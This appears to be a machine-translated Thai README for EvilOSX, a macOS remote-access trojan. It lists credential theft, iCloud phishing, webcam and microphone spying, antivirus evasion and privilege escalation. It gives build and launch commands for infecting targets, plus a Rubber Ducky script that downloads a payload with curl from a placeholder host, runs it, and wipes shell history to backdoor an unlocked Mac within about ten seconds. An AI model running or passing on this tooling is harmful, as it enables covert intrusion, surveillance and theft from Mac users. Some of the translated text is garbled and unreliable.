EvilOSX

Marco Generator โดย Cedric Owens

• เลียนแบบอินสแตนซ์เทอร์มินัล
• ระบบโมดูลที่ขยายได้อย่างง่าย
• ไม่มีการพึ่งพาบอท (python บริสุทธิ์)
• ไม่ถูกตรวจพบโดย Anti-Virus (OpenSSL AES-256 Payloads ที่เข้ารหัส)
• ดื้อดึง
• สนับสนุน GUI และ CLI
• ดึงรหัสผ่านโครเมี่ยม
• ดึงโทเค็น iCloud และผู้ติดต่อ
• ดึง/ตรวจสอบคลิปบอร์ด
• ดึงประวัติเบราว์เซอร์ (Chrome และ Safari)
• Phish สำหรับรหัสผ่าน iCloud ผ่าน iTunes
• iTunes (iOS) การแจกแจงการสำรองข้อมูล
• บันทึกไมโครโฟน
• ถ่ายภาพสกรีนช็อตเดสก์ท็อปหรือรูปภาพโดยใช้เว็บแคม
• พยายามที่จะรับรูทผ่านการเพิ่มสิทธิ์ในท้องถิ่น

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

คำเตือน: เนื่องจากเพย์โหลดถูกสร้างขึ้นเฉพาะกับระบบเป้าหมาย (โดยอัตโนมัติโดยเซิร์ฟเวอร์) เซิร์ฟเวอร์จะต้องทำงานเมื่อบอทเชื่อมต่อเป็นครั้งแรก

นอกจากนี้ยังมี CLI สำหรับผู้ที่ต้องการใช้สิ่งนี้ผ่าน SSH:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

โครงการนี้ถูกสร้างขึ้นเพื่อใช้กับ Ducky ยางของฉันนี่คือสคริปต์ง่ายๆ:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• ใช้เวลาประมาณ 10 วินาทีในการแบ็คดอร์ Mac ที่ปลดล็อคซึ่งก็คือ ...... ดี
• Termina L ถูกสะกดด้วยวิธีโดยเจตนาในบางระบบสปอตไลท์จะไม่พบเทอร์มินัลเป็นอย่างอื่น
  
• ในการข้ามผู้ช่วยการตั้งค่าแป้นพิมพ์ตรวจสอบให้แน่ใจว่าคุณเปลี่ยน VID & PID ซึ่งสามารถพบได้ที่นี่
  คีย์บอร์ดอลูมิเนียม (ISO) น่าจะเป็นเครื่องมือที่คุณกำลังมองหา

EvilOSX จะได้รับการบำรุงรักษาภายใต้แนวทางการกำหนดเวอร์ชันความหมายให้มากที่สุด
การเปิดตัวเซิร์ฟเวอร์และบอทจะถูกกำหนดหมายเลขด้วยรูปแบบการติดตาม:

 <major>.<minor>.<patch>

และสร้างด้วยแนวทางต่อไปนี้:

• การทำลายความเข้ากันได้ย้อนหลัง (กับบอทเก่า) กระแทกวิชาเอก
• เพิ่มเติมใหม่โดยไม่ทำลายความเข้ากันได้ย้อนหลังกระแทกผู้เยาว์
• การแก้ไขข้อผิดพลาดและการเปลี่ยนแปลงการเปลี่ยนแปลง

สำหรับข้อมูลเพิ่มเติมเกี่ยวกับ Semver กรุณาเยี่ยมชม https://semver.org/

• การติดเชื้อเครื่องถูกแบ่งออกเป็นสามส่วน:
  • ตัวเรียก ใช้งานทำงานบนเครื่องเป้าหมายที่มีเป้าหมายเพียงอย่างเดียวคือเรียกใช้ Stager
  • stager ขอให้เซิร์ฟเวอร์สำหรับ ตัวโหลด ซึ่งจัดการวิธีการโหลดน้ำหนักบรรทุก
  • โหลดเดอร์จะได้รับ น้ำหนักบรรทุกที่ เข้ารหัสที่ไม่ซ้ำกันแล้วส่งกลับไปที่ stager
• เซิร์ฟเวอร์ซ่อนการสื่อสารโดยส่งข้อความที่ซ่อนอยู่ในหน้าข้อผิดพลาด HTTP 404 (จาก "ซ่อนตัวอยู่ในสายตาธรรมดา")))
  • คำขอคำสั่งจะถูกดึงมาจากเซิร์ฟเวอร์ผ่านคำขอ GET
  • การตอบกลับคำสั่งจะถูกส่งไปยังเซิร์ฟเวอร์ผ่านคำขอโพสต์
• โมดูลใช้ประโยชน์จากธรรมชาติแบบไดนามิกของ Python พวกเขาจะถูกส่งผ่านเครือข่ายที่ถูกบีบอัดด้วย zlib พร้อมกับตัวเลือกการกำหนดค่าใด ๆ
• เนื่องจากบอทสื่อสารกับเซิร์ฟเวอร์เท่านั้นและไม่เคยมีวิธีอื่นเซิร์ฟเวอร์จึงไม่มีทางรู้ว่าบอทจะออฟไลน์เมื่อใด

อย่าลังเลที่จะส่งปัญหาหรือคำขอคุณสมบัติใด ๆ ที่นี่

สำหรับคำแนะนำง่ายๆเกี่ยวกับวิธีการสร้างโมดูลคลิกที่นี่

• โครงการเอ็มไพร์ที่ยอดเยี่ยม
• ตะโกนไปที่ Patrick Wardle สำหรับการพูดคุยที่ยอดเยี่ยมของเขาลองดูวัตถุประสงค์ดู
• Manwhoami สำหรับโครงการของเขา: Osxchromedecrypt, Mmetokendecrypt, iCloudContacts
  (ตอนนี้ถูกลบ ... แจ้งให้เราทราบหากคุณปรากฏขึ้นอีกครั้ง)
• โมดูล Slowloris ถูกคัดลอกมาจาก Pyslowloris
• Urwid และรหัสนี้ซึ่งช่วยฉันได้มากกับ CLI
• โลโก้ที่สร้างโดย Motusora

GPLV3